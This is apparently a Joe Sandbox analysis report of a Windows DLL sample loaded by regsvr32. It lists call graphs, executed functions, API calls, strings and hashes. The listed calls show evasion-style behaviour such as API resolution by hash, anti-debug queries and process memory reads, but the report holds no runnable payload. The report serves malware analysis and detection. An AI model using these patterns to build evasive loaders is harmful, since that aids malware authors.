54897->54903 54898 6c8f68a8 54898->54831 54910 6c85ac40 HeapFree 54898->54910 54905 6c8f76ee 54899->54905 54906 6c8f76e7 WakeByAddressSingle 54899->54906 54900 6c8f7364 54901 6c8f762d CloseHandle CloseHandle 54900->54901 54901->54857 54901->54879 54902 6c8f696e 54902->54858 54914 6c85ac40 HeapFree 54902->54914 54908 6c8f6638 54903->54908 54904->54705 54904->54766 54904->54767 54904->54771 54904->54793 54905->54859 54913 6c85ac40 HeapFree 54905->54913 54906->54905 54907->54857 54907->54879 54907->54900 54922 6c8f72e2 54907->54922 55040 6c8f8ae0 96 API calls 54907->55040 54908->54867 54940 6c8f6643 54908->54940 54909->54835 54909->54904 54920 6c8f5e98 54909->54920 54926 6c85ac40 HeapFree 54909->54926 54910->54831 54913->54859 54914->54858 54916 6c8f8220 116 API calls 54916->54925 54917 6c8f692f 54928 6c85ac40 HeapFree 54917->54928 54917->54936 54918->54828 54918->54830 54918->54831 54918->54859 54918->54872 54918->54875 54918->54890 54918->54898 54918->54917 54918->54936 55022 6c8bbe70 84 API calls 54918->55022 55036 6c8c9fc0 93 API calls 54918->55036 55038 6c8afbe0 84 API calls 54918->55038 54927 6c85ac40 HeapFree 54920->54927 54921 6c8f747a CreateProcessW 54923 6c8f74ad 54921->54923 54924 6c8f75d5 GetLastError 54921->54924 54922->54921 54929 6c8f7407 54922->54929 54930 6c8f74ff CloseHandle CloseHandle CloseHandle 54923->54930 54931 6c8f74ef 54923->54931 54934 6c8f7618 CloseHandle 54924->54934 54935 6c8f7608 54924->54935 54925->54863 54925->54881 54925->54904 54925->54916 54932 6c85ac40 HeapFree 54925->54932 54933 6c8f776c 54925->54933 55034 6c8e39c0 9 API calls 54925->55034 54926->54920 54927->54835 54928->54936 54929->54934 54938 6c8f7528 CloseHandle 54930->54938 54939 6c8f7534 54930->54939 55041 6c8b1350 HeapFree DeleteProcThreadAttributeList 54931->55041 54932->54925 54933->54904 54943 6c85ac40 HeapFree 54933->54943 54934->54901 55043 6c8b1350 HeapFree DeleteProcThreadAttributeList 54935->55043 55035 6c8afbe0 84 API calls 54936->55035 54938->54939 55042 6c8b0150 13 API calls 54939->55042 54944 6c8bf0f0 90 API calls 54940->54944 54946 6c8f66ae 54940->54946 54948 6c8f6844 54940->54948 54943->54904 54944->54948 54945 6c8f7540 54947 6c8f7559 54945->54947 54949 6c85ac40 HeapFree 54945->54949 54950 6c8f756e 54947->54950 54952 6c85ac40 HeapFree 54947->54952 54948->54918 54951 6c8f6a66 memcpy 54948->54951 54949->54947 54953 6c8f758d 54950->54953 54955 6c85ac40 HeapFree 54950->54955 54954 6c8f6a86 54951->54954 54965 6c8f6a8f 54951->54965 54952->54950 54956 6c8f75a9 54953->54956 54959 6c85ac40 HeapFree 54953->54959 54957 6c8bf0f0 90 API calls 54954->54957 54955->54953 54956->54698 54960 6c85ac40 HeapFree 54956->54960 54957->54965 54958 6c8f6b2f 54958->54918 54961 6c8bf0f0 90 API calls 54958->54961 54959->54956 54962 6c8f75cd 54960->54962 54961->54918 54962->54698 54963 6c8bf0f0 90 API calls 54963->54965 54965->54918 54965->54958 54965->54963 55037 6c8ec8c0 115 API calls 54965->55037 54967 6c8f2390 54966->54967 54976 6c8f235f 54966->54976 54967->54976 54968 6c8f23be SetLastError GetModuleFileNameW 54969 6c8f23d4 GetLastError 54968->54969 54968->54976 54970 6c8f2457 GetLastError 54969->54970 54969->54976 54973 6c8f2449 54970->54973 54974 6c8f2411 54970->54974 54971 6c8f23e1 GetLastError 54971->54976 54977 6c8f2475 54971->54977 54972 6c8f240a 54972->54974 54972->54977 54973->54765 54974->54973 54975 6c85ac40 HeapFree 54974->54975 54975->54973 54976->54967 54976->54968 54976->54971 54976->54972 54978 6c8f24b4 54977->54978 54979 6c85ac40 HeapFree 54977->54979 54980 6c9459b0 83 API calls 54978->54980 54979->54978 54981 6c8f24bd 54980->54981 55049 6c8c9fc0 93 API calls 54981->55049 54983 6c8f24e8 54984 6c8f24f8 SetCurrentDirectoryW 54983->54984 54985 6c8bf0f0 90 API calls 54983->54985 54986 6c8f250e 54984->54986 54987 6c8f2530 GetLastError 54984->54987 54985->54984 54988 6c8f2523 54986->54988 54989 6c85ac40 HeapFree 54986->54989 54987->54986 54987->54988 54988->54765 54989->54988 54991 6c8fa540 90 API calls 54990->54991 54992 6c8f8236 54991->54992 54993 6c8ecd40 115 API calls 54992->54993 54996 6c8f8265 54992->54996 54994 6c8f825c 54993->54994 54994->54996 54997 6c8f82b3 GetFileAttributesW 54994->54997 54995 6c8f8295 54999 6c85ac40 HeapFree 54995->54999 54996->54995 54998 6c85ac40 HeapFree 54996->54998 55002 6c8f5a21 54996->55002 55000 6c8f82d7 54997->55000 54997->55002 54998->54995 54999->55002 55001 6c85ac40 HeapFree 55000->55001 55000->55002 55001->55002 55002->54780 55002->54809 55003->54723 55004->54723 55005->54723 55006->54757 55007->54757 55008->54757 55009->54756 55010->54698 55011->54744 55013 6c8ecd54 55012->55013 55014 6c8ecd67 55012->55014 55013->54904 55014->55013 55015 6c8ecdbc 55014->55015 55016 6c8ecda7 55014->55016 55015->55013 55019 6c8ecdf7 55015->55019 55050 6c8fa6b0 106 API calls 55016->55050 55018 6c8ecdba 55018->55013 55051 6c8faa00 99 API calls 55019->55051 55021->54803 55022->54918 55023->54907 55025 6c8f2146 55024->55025 55026 6c8f227e 55025->55026 55029 6c8bf0f0 90 API calls 55025->55029 55027 6c85ac40 HeapFree 55026->55027 55028 6c8f22c4 55026->55028 55027->55028 55028->54810 55029->55025 55030->54810 55031->54790 55032->54826 55033->54860 55034->54925 55035->54902 55036->54918 55037->54965 55038->54918 55039->54839 55040->54922 55041->54930 55042->54945 55043->54934 55044->54899 55045->54899 55046->54711 55047->54741 55048->54840 55049->54983 55050->55018 55051->55018

                                                                  Executed Functions

                                                                  Function 6C8F3C94 Relevance: 107.3, APIs: 48, Strings: 11, Instructions: 4072COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 6C8F3CE6
                                                                  • FreeEnvironmentStringsW.KERNEL32(?), ref: 6C8F3E7A
                                                                  • CloseHandle.KERNEL32(?), ref: 6C8F47EA
                                                                  • GetLastError.KERNEL32 ref: 6C8F7943
                                                                  • CloseHandle.KERNEL32(?), ref: 6C8F7FE6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseEnvironmentHandleStrings$ErrorFreeLast
                                                                  • String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$?$H$PATHstd\src\sys_common\process.rs$\?\\$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
                                                                  • API String ID: 1593577933-2749016963
                                                                  • Opcode ID: 8e86767ae253443d7893b9a13645cf69a95d264f98fbde20e88dd6f3e3d94515
                                                                  • Instruction ID: 50c733ea15049571c02fe84a99038268aed8001b687a251f8283995e9f8f1167
                                                                  • Opcode Fuzzy Hash: 8e86767ae253443d7893b9a13645cf69a95d264f98fbde20e88dd6f3e3d94515
                                                                  • Instruction Fuzzy Hash: E27391719093819FE330CF18CA80B9AB7E1BFC5348F158E2DE8A897751D7759906CB92
                                                                  Function 6C8543E0 Relevance: 43.4, APIs: 14, Strings: 10, Instructions: 1385memorysynchronizationCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1166 6c8543e0-6c85443d call 6c852730 call 6c851a10 call 6c920e90 1173 6c854443-6c85445d CreateMutexA GetLastError 1166->1173 1174 6c854589-6c8545b4 call 6c92c280 1166->1174 1175 6c85445f-6c854464 1173->1175 1176 6c85447a-6c8544ab call 6c858960 call 6c855c30 call 6c85ac30 1173->1176 1183 6c8545c5-6c8545f8 call 6c85ac40 1174->1183 1178 6c854466-6c85446f call 6c85ac40 1175->1178 1179 6c854472-6c854479 1175->1179 1196 6c8545b6-6c8545c2 call 6c920620 1176->1196 1197 6c8544b1-6c8544c8 memcpy 1176->1197 1178->1179 1192 6c85460a 1183->1192 1193 6c8545fa-6c854607 call 6c85ac40 1183->1193 1198 6c854610-6c85461c call 6c852730 1192->1198 1199 6c85460b call 6c9459b0 1192->1199 1193->1192 1196->1183 1203 6c8544d0-6c8544e5 1197->1203 1199->1198 1203->1203 1205 6c8544e7-6c85450d HeapCreate HeapAlloc GetLastError 1203->1205 1206 6c854563-6c85457e call 6c85ac40 1205->1206 1207 6c85450f-6c854523 call 6c855c30 call 6c856300 1205->1207 1206->1178 1213 6c854584 1206->1213 1214 6c854528-6c854532 1207->1214 1213->1179 1215 6c854544-6c85455e memmove HeapFree 1214->1215 1216 6c854534 1214->1216 1215->1206 1216->1215 1217 6c854536-6c854541 call 6c85ac40 1216->1217 1217->1215
                                                                  APIs
                                                                    • Part of subcall function 6C920E90: memcpy.MSVCRT(00000000,?,6C854435,?,?,6C854435,?,?,00000005), ref: 6C920ED2
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6C85444E
                                                                  • GetLastError.KERNEL32(00000000,00000000,?), ref: 6C854453
                                                                  • memcpy.MSVCRT(00000000,6C9553D4,00022BD5,?,?,?), ref: 6C8544BE
                                                                  • HeapCreate.KERNEL32(00040000,00000000,00000000,?,?,?,?,?,?), ref: 6C8544F0
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00022BD5,00040000,00000000,00000000,?,?,?,?,?,?), ref: 6C8544FF
                                                                  • GetLastError.KERNEL32(00000000,00000008,00022BD5,00040000,00000000,00000000,?,?,?,?,?,?), ref: 6C854506
                                                                  • memmove.MSVCRT(?,00000000,00022BD5,?,00000000,?,?,?,?,?,?), ref: 6C85454E
                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6C85455E
                                                                    • Part of subcall function 6C85AC40: HeapFree.KERNEL32(00000000,0000000C), ref: 6C8E9FA8
                                                                  • memcmp.MSVCRT(?,?,0000000A), ref: 6C8546FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CreateErrorFreeLastmemcpy$AllocMutexmemcmpmemmove
                                                                  • String ID: $ nAj$$8g%$-$1 -$@H1$Vw;c$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs$not yet implemented$~<.5
                                                                  • API String ID: 1533937674-4106935003
                                                                  • Opcode ID: 4923ffcd203aa133b9df6b714b994145a58fc1468659bdbd036d7ddc6cd3ec46
                                                                  • Instruction ID: f4cc76f7250980d664516667054c83bc34d8b79636a1f3c2040e172f9ab1c386
                                                                  • Opcode Fuzzy Hash: 4923ffcd203aa133b9df6b714b994145a58fc1468659bdbd036d7ddc6cd3ec46
                                                                  • Instruction Fuzzy Hash: D4D28DB1D002299FDB64CFA4CD81BEEBBB4AF49304F5044A9E909BB741E7719A94CF50
                                                                  Function 6C874C20 Relevance: 35.8, APIs: 19, Strings: 1, Instructions: 754memorynativetimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1221 6c874c20-6c874c38 1222 6c874c3e-6c874cb2 1221->1222 1223 6c874fb9-6c874fc0 1221->1223 1226 6c874cb4-6c874cce GetProcessTimes 1222->1226 1227 6c874d02-6c874d25 GetSystemTimes 1222->1227 1224 6c874fc6-6c874fce 1223->1224 1225 6c87504d-6c875054 1223->1225 1224->1225 1229 6c874fd0-6c874fe2 GetProcessIoCounters 1224->1229 1232 6c875056-6c87506b 1225->1232 1233 6c87506f-6c875077 1225->1233 1226->1227 1228 6c874cd0-6c874cf0 call 6c89a6b0 1226->1228 1230 6c874d27-6c874d41 call 6c89a6b0 1227->1230 1231 6c874d44-6c874e26 1227->1231 1228->1227 1256 6c874cf2-6c874cff call 6c89a660 1228->1256 1235 6c874fe4-6c875003 1229->1235 1236 6c87501b-6c87503b call 6c89a6b0 1229->1236 1230->1231 1238 6c875005-6c875017 1231->1238 1239 6c874e2c-6c874fa7 1231->1239 1232->1233 1240 6c875266-6c87527f 1233->1240 1241 6c87507d-6c875086 1233->1241 1235->1225 1236->1225 1264 6c87503d-6c87504a call 6c89a660 1236->1264 1245 6c874fa9-6c874fb6 call 6c89a660 1238->1245 1246 6c875019 1238->1246 1239->1223 1239->1245 1242 6c875281-6c87528a 1240->1242 1243 6c87529c-6c87529e 1240->1243 1241->1240 1249 6c87508c-6c87508f 1241->1249 1252 6c875290-6c87529a 1242->1252 1253 6c87531a-6c875325 1242->1253 1254 6c8752b7-6c8752b9 1243->1254 1255 6c8752a0-6c8752a9 1243->1255 1245->1223 1246->1223 1250 6c875091-6c875099 1249->1250 1251 6c87509f-6c8750ba call 6c8898f0 OpenProcessToken 1249->1251 1250->1240 1250->1251 1276 6c875171-6c875191 call 6c89a6b0 1251->1276 1277 6c8750c0-6c8750ca 1251->1277 1252->1243 1252->1253 1265 6c875b5d-6c875b6c 1253->1265 1266 6c87532b-6c875351 NtQueryInformationProcess 1253->1266 1262 6c8752bb-6c8752c4 1254->1262 1263 6c8752d8-6c8752e5 1254->1263 1255->1253 1260 6c8752ab-6c8752b5 1255->1260 1256->1227 1260->1253 1260->1254 1262->1253 1272 6c8752c6-6c8752d6 1262->1272 1263->1253 1280 6c8752e7-6c875302 1263->1280 1264->1225 1270 6c875b72-6c875b7b 1265->1270 1271 6c875c5a-6c875c8b 1265->1271 1266->1265 1275 6c875357-6c875384 NtQueryInformationProcess 1266->1275 1278 6c875b87-6c875bd9 memset call 6c8898f0 GetModuleFileNameExW 1270->1278 1279 6c875b7d-6c875b81 1270->1279 1272->1253 1272->1263 1275->1265 1284 6c87538a-6c8753ac 1275->1284 1276->1240 1293 6c875197-6c87519f call 6c89a660 1276->1293 1277->1240 1285 6c8750d0-6c8750f8 GetTokenInformation 1277->1285 1305 6c875be0-6c875be9 1278->1305 1279->1271 1279->1278 1280->1265 1287 6c875308 1280->1287 1284->1265 1289 6c8753b2-6c8753b4 1284->1289 1290 6c8751e4-6c875203 call 6c89a6b0 1285->1290 1291 6c8750fe-6c875110 GetProcessHeap 1285->1291 1287->1253 1294 6c875494-6c8754fe ReadProcessMemory * 2 1289->1294 1295 6c8753ba-6c8753d5 ReadProcessMemory 1289->1295 1316 6c875205-6c875207 1290->1316 1317 6c87521b-6c87521d 1290->1317 1296 6c875116-6c875121 HeapAlloc 1291->1296 1297 6c8751ac-6c8751cc call 6c89a6b0 1291->1297 1308 6c8751a4-6c8751a7 1293->1308 1325 6c875504-6c875516 1294->1325 1326 6c87576c-6c875782 1294->1326 1301 6c8753db-6c875487 ReadProcessMemory memcpy call 6c8769d0 call 6c876b70 call 6c8766c0 1295->1301 1303 6c875127-6c87513c GetTokenInformation 1296->1303 1304 6c875258-6c875260 CloseHandle 1296->1304 1297->1304 1322 6c8751d2-6c8751e2 call 6c89a660 1297->1322 1301->1294 1311 6c875142-6c87515f call 6c8626d0 1303->1311 1312 6c87522a-6c87523f call 6c89a6b0 1303->1312 1304->1240 1318 6c8755fd 1304->1318 1313 6c875bf6-6c875c56 call 6c8e0f60 1305->1313 1314 6c875beb-6c875bef 1305->1314 1308->1240 1349 6c875165-6c87516c call 6c874370 1311->1349 1350 6c875604-6c875620 1311->1350 1346 6c875251-6c875253 call 6c874370 1312->1346 1347 6c875241-6c87524e call 6c89a660 1312->1347 1313->1271 1314->1305 1324 6c875bf1 1314->1324 1316->1291 1328 6c87520d-6c875216 call 6c89a660 1316->1328 1317->1304 1319 6c87521f-6c875228 call 6c89a660 1317->1319 1318->1276 1319->1304 1322->1304 1324->1313 1337 6c875528-6c875559 call 6c876890 1325->1337 1338 6c875518-6c875522 1325->1338 1344 6c875784-6c87578b 1326->1344 1345 6c875791-6c8757d0 VirtualQueryEx call 6c8765b0 1326->1345 1328->1291 1368 6c87555e-6c87556e call 6c87e530 1337->1368 1338->1326 1338->1337 1344->1345 1370 6c8757d5-6c875813 1345->1370 1346->1304 1347->1346 1367 6c87565c-6c875669 call 6c861300 1349->1367 1358 6c875643-6c875657 call 6c874370 1350->1358 1359 6c875622-6c875640 call 6c85ac40 1350->1359 1358->1367 1359->1358 1367->1308 1378 6c875584-6c875768 1368->1378 1379 6c875570-6c875581 call 6c85ac40 1368->1379 1380 6c87581b-6c875820 1370->1380 1378->1326 1379->1378 1381 6c875815-6c875819 1380->1381 1382 6c875822-6c87582f call 6c85ac40 1380->1382 1381->1380 1382->1381
                                                                  APIs
                                                                  • GetProcessTimes.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 6C874CC7
                                                                    • Part of subcall function 6C89A6B0: GetLastError.KERNEL32(?,6C86131E,6C8577BC,?,6C8577BC,?,?,?,?,6C851F14,?), ref: 6C89A6B3
                                                                  • GetSystemTimes.KERNEL32(00000000,00000000,00000000), ref: 6C874D17
                                                                  • GetProcessIoCounters.KERNEL32(?,?), ref: 6C874FDB
                                                                  • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 6C8750B3
                                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 6C8750F1
                                                                  • GetProcessHeap.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 6C875105
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000000,?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 6C87511A
                                                                  • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,00000000,00000000,00000008,00000000,?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 6C875135
                                                                  • CloseHandle.KERNEL32(?,?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 6C875259
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C87534A
                                                                  • NtQueryInformationProcess.NTDLL ref: 6C87537D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Information$Token$HeapQueryTimes$AllocCloseCountersErrorHandleLastOpenSystem
                                                                  • String ID: P=p
                                                                  • API String ID: 2108018208-1494869396
                                                                  • Opcode ID: de807f53dda19503c649355e850e6297b5384502d09da07da3bcffd812359227
                                                                  • Instruction ID: 272af59c72f92779ab5d163ec5c0a02514cc110173b8374210a8e3bce5818fe5
                                                                  • Opcode Fuzzy Hash: de807f53dda19503c649355e850e6297b5384502d09da07da3bcffd812359227
                                                                  • Instruction Fuzzy Hash: 4762A1719093409FD731CF28C984BAEB7E5BFC5304F148A2DE89997651EB31E944CB62
                                                                  Function 6C855C30 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 408libraryloadertimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateTimerQueue.KERNEL32 ref: 6C855C39
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C855C50
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6C855C5F
                                                                  • LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 6C855CD9
                                                                  • GetProcAddress.KERNEL32(00000000,24199433), ref: 6C855D44
                                                                  • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 6C855D8E
                                                                  • GetProcAddress.KERNEL32(00000000,DA12A734), ref: 6C855DEA
                                                                  • LoadLibraryA.KERNEL32(?,00000000,DA12A734,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C855E39
                                                                  • GetProcAddress.KERNEL32(00000000,ABA9F710), ref: 6C855EA4
                                                                  • LoadLibraryA.KERNEL32(?,00000000,ABA9F710,?,?,00000000,DA12A734,?,?,?,?,?,?,?,?,00000000), ref: 6C855EFE
                                                                  • GetProcAddress.KERNEL32(00000000,1B571B31), ref: 6C855F68
                                                                  • LoadLibraryA.KERNEL32(?,00000000,1B571B31,?,?,00000000,ABA9F710,?,?,00000000,DA12A734,?,?), ref: 6C855FC2
                                                                  • GetProcAddress.KERNEL32(?,D39EAE30), ref: 6C85602C
                                                                  • LoadLibraryA.KERNEL32(D39EAE30,?,D39EAE30,?,?,00000000,1B571B31,?,?,00000000,ABA9F710,?,?,00000000,DA12A734), ref: 6C856083
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6C8560CF
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,D39EAE30,?,D39EAE30,?,?,00000000,1B571B31,?,?), ref: 6C856115
                                                                  • WaitForSingleObject.KERNEL32(00000000,?,00000000,00000001,00000000,00000000,00000000,?,?,D39EAE30,?,D39EAE30,?,?,00000000,1B571B31), ref: 6C856124
                                                                  • SetEvent.KERNEL32(00000000,00000000,?,00000000,00000001,00000000,00000000,00000000,?,?,D39EAE30,?,D39EAE30,?,?,00000000), ref: 6C85614C
                                                                  • DeleteTimerQueue.KERNEL32(?), ref: 6C856154
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad$CreateEvent$HandleModuleQueueTimer$DeleteObjectSingleWait
                                                                  • String ID: {?m
                                                                  • API String ID: 3325657596-405188894
                                                                  • Opcode ID: 3ff4ad5bc09a559fcbc8975c611c26c94fd6ca1015e3abfc24ed74c44d5d8f10
                                                                  • Instruction ID: ce9912aeb018822277bb800d6e0152be34f6d0436e3cc0e6293f0c59614e5907
                                                                  • Opcode Fuzzy Hash: 3ff4ad5bc09a559fcbc8975c611c26c94fd6ca1015e3abfc24ed74c44d5d8f10
                                                                  • Instruction Fuzzy Hash: 270227B1D002689FCF41CFA5D8809EEBBB4BF1D304F55826AE405BB351E7389615CB60
                                                                  Function 6C856300 Relevance: 28.6, APIs: 13, Strings: 3, Instructions: 554nativelibrarythreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1535 6c856300-6c856336 memset 1536 6c85633c-6c85638d call 6c851460 call 6c920e90 1535->1536 1537 6c85647a-6c856481 1535->1537 1554 6c856950-6c85697e call 6c92c280 1536->1554 1555 6c856393-6c8563a7 GetModuleHandleA 1536->1555 1538 6c856487-6c8564e1 call 6c8518d0 call 6c920e90 1537->1538 1539 6c8565b9-6c8565f0 AddVectoredExceptionHandler NtQueryInformationProcess 1537->1539 1560 6c8564e7-6c856563 GetModuleHandleA call 6c8516f0 call 6c920e90 1538->1560 1561 6c8569b3-6c8569e1 call 6c92c280 1538->1561 1542 6c8565f2-6c8565f5 1539->1542 1543 6c8565f8-6c856611 call 6c85ac30 1539->1543 1542->1543 1552 6c856944-6c85694b call 6c920620 1543->1552 1553 6c856617-6c856634 NtQuerySystemInformation 1543->1553 1552->1554 1562 6c8568b6-6c8568c0 call 6c85ac40 1553->1562 1563 6c85663a-6c856657 1553->1563 1572 6c856a14-6c856a1d 1554->1572 1556 6c8563b7-6c856424 call 6c851d60 call 6c920e90 1555->1556 1557 6c8563a9-6c8563b1 LoadLibraryA 1555->1557 1598 6c856983-6c8569b1 call 6c92c280 1556->1598 1599 6c85642a-6c856439 GetProcAddress 1556->1599 1557->1556 1564 6c856907-6c856917 1557->1564 1603 6c8569e3-6c856a11 call 6c92c280 1560->1603 1604 6c856569-6c856578 GetProcAddress 1560->1604 1561->1572 1573 6c8568c5-6c8568dc 1562->1573 1563->1562 1570 6c85665d-6c85666f 1563->1570 1575 6c85691e-6c856929 1564->1575 1577 6c856670-6c85667a 1570->1577 1584 6c856a1f-6c856a2d call 6c85ac40 1572->1584 1585 6c856a6a-6c856a74 1572->1585 1579 6c856937-6c856943 1573->1579 1575->1579 1581 6c85692b-6c85692e 1575->1581 1582 6c8566a0-6c8566ac 1577->1582 1583 6c85667c-6c856687 1577->1583 1592 6c85692f-6c856934 call 6c85ac40 1581->1592 1582->1583 1586 6c8566ae-6c8566b7 1582->1586 1593 6c85668d-6c856692 1583->1593 1594 6c85672c-6c856734 1583->1594 1584->1585 1588 6c856a76-6c856ab9 call 6c85ac40 1585->1588 1589 6c856abc-6c856ac2 call 6c9459b0 1585->1589 1595 6c8566d3-6c85670e NtOpenThread 1586->1595 1588->1589 1592->1579 1593->1577 1606 6c856694 1593->1606 1601 6c85689e-6c8568a3 1594->1601 1602 6c85673a-6c856756 call 6c85ac40 1594->1602 1608 6c856710-6c85671c 1595->1608 1609 6c8566cd-6c8566d1 1595->1609 1598->1572 1612 6c856821-6c856840 1599->1612 1613 6c85643f-6c856453 1599->1613 1601->1562 1607 6c8568a5-6c8568b3 call 6c85ac40 1601->1607 1643 6c856760-6c856762 1602->1643 1603->1572 1616 6c856857-6c856873 1604->1616 1617 6c85657e-6c85658f 1604->1617 1606->1594 1607->1562 1628 6c8566c0-6c8566ca 1608->1628 1629 6c85671e-6c85672a call 6c856f50 1608->1629 1609->1583 1609->1595 1612->1575 1621 6c856846-6c856852 call 6c85ac40 1612->1621 1622 6c856455-6c85645e call 6c85ac40 1613->1622 1623 